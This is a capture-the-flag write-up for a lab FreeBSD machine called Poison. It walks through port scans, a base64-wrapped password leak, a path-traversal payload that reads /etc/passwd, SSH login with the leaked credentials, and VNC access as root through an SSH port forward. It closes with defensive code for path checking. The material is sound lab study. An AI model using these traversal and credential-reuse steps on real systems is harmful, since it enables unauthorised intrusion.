![[Pasted image 20250616234510.png]]

# Port Scanning - Nmap

As usual, I started off by scanning all TCP ports, and two ports are open: 22 and 80.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-16 21:06 CDT
Nmap scan report for 10.10.10.84
Host is up (0.052s latency).
Not shown: 53998 filtered tcp ports (no-response), 11535 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 57.34 seconds
```

Next, I performed a detailed port scan against ports 22 and 80.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-16 21:10 CDT
Nmap scan report for 10.10.10.84
Host is up (0.053s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.77 seconds
```

I can't forget to scan UDP ports as well.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-16 21:13 CDT
Nmap scan report for 10.10.10.84
Host is up (0.066s latency).
All 1000 scanned ports on 10.10.10.84 are in ignored states.
Not shown: 807 open|filtered udp ports (no-response), 193 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
```

---

# Footprinting

This is what's hosted on port 80. Notice there are multiple scripts to be tested. What could that mean?

![[Pasted image 20250616211520.png]]

`/ini.php`

![[Pasted image 20250616211810.png]]

`/info.php`

![[Pasted image 20250616211833.png]]

`/listfiles.php`

![[Pasted image 20250616211901.png]]

`/phpinfo.php`

![[Pasted image 20250616211927.png]]

`listfiles.php` looks like it's listing all of the files in the path. There's also a file named `pwdbackup.txt`. This is what's returned from the server when I inputted `pwdbackup.txt` in the field.

![[Pasted image 20250616220224.png]]

By the look of it, it appears to be base64 encoded, several times over. Let's decode it and get the original password.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ data=$(cat password.b64); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data
Charix!2#4%6&8(0
```

**Let's break down the command above**:

- `data=$(cat password.b64)` - read the file `password.b64` and save it to the variable `data`.
- `for i in $(seq 1 13); do ...; done` - the loop iterates 13 times, and it decodes `data` once in each iteration.
- `data=$(echo $data | tr -d ' ' | base64 -d)`
  - `echo $data`: output the current content of the `data` variable.
  - `tr -d ' '`: strip the spaces (the unquoted `echo $data` has already turned the file's line breaks into spaces).
  - `base64 -d`: decode one layer of base64.
  - `data=$(...)`: save the decoded output back to the `data` variable.

**The password**: `Charix!2#4%6&8(0`

# LFI

I turned on the interceptor in Burp Suite and captured the response after inputting some random strings in the input field `Scriptname`. The response says "No such file or directory in `/usr/local/www/apache24/data/browse.php`". It's telling us the exact location of the script on the server, and by the look of the response, I feel directory traversal might work. Let's see if my feelings are right.
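Before following that hunch, a note on the decoding step above: the shell loop hard-codes 13 iterations, which you only know after trial and error. The Python below is an added example (not from the original post) that peels nested base64 until the result stops being valid base64, so the depth need not be known; the sample input is constructed here to stand in for `pwdbackup.txt`.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable.encode())

def peel_base64(blob: bytes, max_layers: int = 64):
    """Decode nested base64 until the result is no longer base64.

    Returns (plaintext, layers_removed). Whitespace (the line breaks in a
    file like pwdbackup.txt) is stripped before each decode, which is what
    `tr -d ' '` did in the shell loop. Decoding stops as soon as a layer is
    not valid base64 or would yield non-printable bytes.
    """
    data = blob
    for layers in range(max_layers):
        stripped = b"".join(data.split())
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except (binascii.Error, ValueError):
            # e.g. "Charix!2#4%6&8(0": '!' is outside the base64 alphabet
            return data, layers
        # Catches the rarer case where text happens to decode into binary junk.
        if not decoded or any(b not in PRINTABLE for b in decoded):
            return data, layers
        data = decoded
    return data, max_layers

def wrap_base64(secret: bytes, layers: int, width: int = 76) -> bytes:
    """Constructed sample input: wrap `secret` in `layers` base64 encodings,
    breaking lines every `width` characters like the file on the target."""
    data = secret
    for _ in range(layers):
        enc = base64.b64encode(data)
        data = b"\n".join(enc[i:i + width] for i in range(0, len(enc), width))
    return data

if __name__ == "__main__":
    sample = wrap_base64(b"Charix!2#4%6&8(0", 13)   # stands in for pwdbackup.txt
    plaintext, depth = peel_base64(sample)
    print(depth, plaintext.decode())              # 13 Charix!2#4%6&8(0
```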
![[Pasted image 20250616212426.png]]

This time I inputted `../../../../../../../etc/passwd` and the server returned the file, which confirms the directory traversal vulnerability.

![[Pasted image 20250616212651.png]]

# Log into SSH with the found credentials

Successfully logged into the SSH server with the found credentials `charix:Charix!2#4%6&8(0`.

```bash
ssh charix@$IP
```

```bash
Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List:        https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/
<SNIP>
charix@Poison:~ % whoami
charix
```

Found the `user.txt` flag!

```bash
charix@Poison:~ % ls
secret.zip user.txt
charix@Poison:~ % cat user.txt
eaac...
```

# Privilege Escalation

When attempting to unzip the `secret.zip` file, it asks for a passphrase.

```bash
charix@Poison:~ % unzip secret.zip
Archive:  secret.zip
 extracting: secret                  |
unzip: Passphrase required for this entry
```

I copied the file from the SSH server to my local machine with `scp`.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ scp charix@10.10.10.84:/home/charix/secret.zip ./secret.zip
(charix@10.10.10.84) Password for charix@Poison:
secret.zip
```

I reused the password that I found earlier and successfully extracted the file.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret

┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ls -la secret
-r--r--r-- 1 parallels parallels 8 Jan 24  2018 secret

┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat secret
[|Ֆz!
```

`netstat -a` reveals that **localhost is listening on ports 5801 and 5901**.

```bash
charix@Poison:~ % netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0     44 10.10.10.84.ssh        10.10.14.6.45220       ESTABLISHED
tcp4       0      0 localhost.smtp         *.*                    LISTEN
tcp4       0      0 *.http                 *.*                    LISTEN
tcp6       0      0 *.http                 *.*                    LISTEN
tcp4       0      0 *.ssh                  *.*                    LISTEN
tcp6       0      0 *.ssh                  *.*                    LISTEN
tcp4       0      0 localhost.5801         *.*                    LISTEN
tcp4       0      0 localhost.5901         *.*                    LISTEN
udp4       0      0 *.syslog               *.*
udp6       0      0 *.syslog               *.*
```

Using `wget` locally on the SSH server, port 5801 returns a 404, while port 5901 returns a 12-byte response that `wget` saves as `index.html`.

```bash
charix@Poison:~ % wget http://127.0.0.1:5801
--2025-06-17 06:12:34--  http://127.0.0.1:5801/
Connecting to 127.0.0.1:5801... connected.
HTTP request sent, awaiting response... 404 Not found
2025-06-17 06:12:34 ERROR 404: Not found.
```

```bash
charix@Poison:~ % wget http://127.0.0.1:5901
--2025-06-17 06:12:55--  http://127.0.0.1:5901/
Connecting to 127.0.0.1:5901... connected.
HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9
Length: unspecified
Saving to: 'index.html'

index.html              [ <=>                ]      12  --.-KB/s    in 0s

2025-06-17 06:12:55 (1.08 MB/s) - 'index.html' saved [12]
```

# Local Port Forwarding

Using local port forwarding, I expect to be able to access `127.0.0.1:5901` on the target from my local Kali environment.

```bash
ssh -L 1234:127.0.0.1:5901 charix@10.10.10.84
```

Logging into the SSH server again, this time with the forward in place:

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ssh -L 1234:127.0.0.1:5901 charix@10.10.10.84
(charix@10.10.10.84) Password for charix@Poison:
Last login: Tue Jun 17 05:22:45 2025 from 10.10.14.6
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!
<SNIP>
charix@Poison:~ %
```

This creates a tunnel from our local port 1234 to the target's loopback port 5901, so we can reach the application that only listens on localhost. I didn't know that `5801` and `5901` are actually VNC ports, used for remote desktop access.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc 127.0.0.1 1234
RFB 003.008
```

We can connect to the VNC server through our local port 1234 using the following syntax:

```bash
vncviewer 127.0.0.1:1234
```

vncviewer asks for a password. I reused the password found earlier, but this time it didn't work. Let's use the encrypted password we got from the zip file instead.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ vncviewer 127.0.0.1:1234
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password:
Authentication failed
```

`man vncviewer` reveals there's actually a `-passwd <passwd-file>` option that reads the password from a file.

![[Pasted image 20250616233819.png]]

`vncviewer 127.0.0.1:1234 -passwd secret` opened up a viewer window named `TightVNC`, and I'm already logged in as root in the viewer!

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ vncviewer 127.0.0.1:1234 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
```

Found the `root.txt` flag!

![[Pasted image 20250616234246.png]]
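As a defender's footnote on the LFI section: the foothold came from `browse.php` passing the `file` parameter straight to the filesystem. The Python below is an added example (not the target's PHP) of the check it was missing; the web root is the one leaked in the Apache error message, and the helper names are mine.

```python
import os

# Web root taken from the "No such file or directory in ..." message.
DOC_ROOT = "/usr/local/www/apache24/data"

def resolve_in_root(root: str, user_path: str):
    """Return the absolute path for `user_path` if it stays inside `root`,
    otherwise None.

    The user-supplied name is joined to the root and normalised, which
    collapses every `..`; realpath also follows symlinks that exist, so a
    link inside the root pointing at /etc/passwd is caught too. The result
    must still start with the root. Absolute paths and NUL bytes are
    rejected outright.
    """
    if not user_path or "\x00" in user_path or os.path.isabs(user_path):
        return None
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

def serve_file(user_path: str, root: str = DOC_ROOT) -> str:
    """Mimic the browse.php handler with the check applied."""
    path = resolve_in_root(root, user_path)
    if path is None:
        return "rejected: path escapes the web root"
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        # Keep the error generic: the original leaked the full script path.
        return f"error: cannot read {os.path.basename(path)}"

if __name__ == "__main__":
    print(serve_file("../../../../../../../etc/passwd"))  # rejected
    print(resolve_in_root(DOC_ROOT, "pwdbackup.txt"))     # stays under root
```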